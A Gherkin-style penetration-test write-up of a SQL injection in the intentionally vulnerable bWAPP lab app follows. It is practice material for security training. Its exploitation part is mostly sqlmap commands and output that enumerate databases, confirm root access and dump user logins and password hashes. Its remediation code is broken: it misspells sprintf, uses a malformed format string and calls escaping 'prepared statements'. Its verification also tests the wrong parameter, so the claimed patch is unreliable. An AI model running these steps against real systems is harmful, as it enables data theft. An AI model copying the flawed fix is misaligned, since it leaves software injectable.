# language: en

Feature: Retrieve sensitive data by using SQL blind injections
  From the bWAPP application
  From the A1... category
  With low security level
  As any user from Internet with acces to bWAPP
  I want to be able to execute blind SQL injections on the database
  In order to gain access to its sensitive information
  Due to a code missing prepared statements for queries
  Recommendation: use prepared statements for queries

  Background:
    Given I am running Kali GNU/Linux kernel 4.18.0-kali1-amd64
    And I am browsing in Firefox Quantum 60.2.0
    And I am running sqlmap 1.2.9
    And I am running Burp 1.7.36
    And I am running bee-box 1.6.7 in Virtualbox 5.2.18:
    """l
    Ubuntu 8.04, kernel=2.6.24-16-generic, MySQL 5.0.99, Apache 2.2.8, PHP 5.2.4
    """
    Given a PHP site that allows me to search for a movie using a text field
    Then the goal is inject a SQL statement for retrieving sentive data

  Scenario: Normal use case
    Given I am at the page bWAPP/sqli_6.php
    And I type "Hulk" on the login field
    And I click on the button "search"
    Then I get the following output a table
    And just one row provides information about The Incredible Hulk

  Scenario: Static detection
  The PHP code doesn't make use of prepared statements and parametrized queries
    When I look at the page source code
    Then I see the code that constructs the query:
    """
    141  $title = $_POST["title"];
    142  $sql = "SELECT * FROM movies WHERE title LIKE '%" . \
         sqli($title) . "%'";
    143  $recordset = mysql_query($sql, $link);
    """
    Then I see that due to the lack of sanitization I can make SQLis

  Scenario: Dynamic detection
  The page allows to execute SQL injections
    Given I am listening with burp using a proxy
    And go to the site
    And type "Hulk" on the text field
    And click on the  "search" button
    Then I catch a html POST request, which contains a variable called "title"
    """
    POST /bWAPP/sqli_6.php HTTP/1.1
    Host: 192.168.56.101 # Bwapps ip
    ... # Unimportant lines
    Cookie: security_level=0; has_js=1; \
    PHPSESSID=09b6ce43ecc76791e7df908ba557e3a8
    Connection: close

    title=Hulk&action=search
    """
    Then while on burp's caught request, I click on "action"
    And then on "save item"
    And save the item in my home directory as burp_i
    Then I run the following sqlmap command to search for possible injections
    """
    $ sqlmap -r burp_i -p title --dbs
    """
    And get this output:
    """
    ...
    Parameter: title (POST)
    Type: boolean-based blind
    ...
    Type: error-based
    ...
    Type: AND/OR time-based blind
    ...
    Type: UNION query
    ...
    [08:17:58] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8
    back-end DBMS: MySQL >= 4.1
    [08:17:58] [INFO] fetching database names
    available databases [4]:
    [*] bWAPP
    [*] drupageddon
    [*] information_schema
    [*] mysql
    ...
    """
    Then I can confirm that SQLis can be made by using the title parameter
    And that the MySQL version is outdated

  Scenario: Exploitation
  Obtaining sensitive information
    Given I know how to make SQL injections into the DB
    Then I can find sensitive information from the DB's
    Then I start by checking what user I am with the following command:
    """
    sqlmap -r burp_i --current-user
    """
    Then I get the following output:
    """
    ...
    [08:34:13] [INFO] fetching current user
    current user:    'root@localhost'
    ...
    """
    Then I know I have unrestricted access to the DB
    Then I identify the columns of bWAPP DB with the command:
    """
    sqlmap -r burp_i -D bWAPP --tables
    """
    And get the following output:
    """
    ...
    [08:20:35] [INFO] fetching tables for database: 'bWAPP'
    Database: bWAPP
    [5 tables]
    +----------+
    | blog     |
    | heroes   |
    | movies   |
    | users    |
    | visitors |
    +----------+
    """
    Then I get the columns of the "users" table with the command:
    """
    sqlmap -r burp_i -D bWAPP -T users --columns
    """
    And get the following output:
    """
    ...
    [08:21:38] [INFO] fetching columns for table 'users' in database 'bWAPP'
    Database: bWAPP
    Table: users
    [9 columns]
    +-----------------+--------------+
    | Column          | Type         |
    +-----------------+--------------+
    | activated       | tinyint(1)   |
    | activation_code | varchar(100) |
    | admin           | tinyint(1)   |
    | email           | varchar(100) |
    | id              | int(10)      |
    | login           | varchar(100) |
    | password        | varchar(100) |
    | reset_code      | varchar(100) |
    | secret          | varchar(100) |
    +-----------------+--------------+
    ...
    """
    Then I get the login and passwords for all users with the command:
    """
    sqlmap -r burp_i -D bWAPP -T users -C login,password --dump
    """
    And get the following output:
    """
    ...
    Database: bWAPP
    Table: users
    [2 entries]
    +--------+------------------------------------------------+
    | login  | password                                       |
    +--------+------------------------------------------------+
    | A.I.M. | 6885858486f31043e5839c735d99457f045affd0 (bug) |
    | bee    | 6885858486f31043e5839c735d99457f045affd0 (bug) |
    +--------+------------------------------------------------+
    ...
    """
    Then I succeded on finding all users and cracked passwords for the DB
    And getting unrestricted access to the DB

  Scenario: Remediation
  The PHP code can be fixed by using query prepared statements on the code
    When I use sprintf for replacing variables in a static query string
    And run the mysql_real_escape_string function on the $title parameter
    Then I make the movie field invulnerable to SQL injections
    """
    141  $title = $_POST["title"];
    142  $sql = sprinf("SELECT * FROM movies WHERE title LIKE '%%s%'",
         mysql_real_escape_string($title));
    144  $recordset = mysql_query($sql, $link);
    """
    When I test the site with mapsql using the following command:
    """
    sqlmap -r burp_i -p password --level 3 --risk 3 --dbs
    """
    Then the output from mapsql is:
    """
    [11:06:47] [CRITICAL] all tested parameters do not appear to be \
    injectable. Try to increase values for '--level'/'--risk' options if you \
    wish to perform more tests. If you suspect that there is some kind of \
    protection mechanism involved (e.g. WAF) maybe you could try to use \
    option '--tamper' (e.g. '--tamper=space2comment')
    """
    Then I know that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
  No correlations have been found to this date 10-30-2018
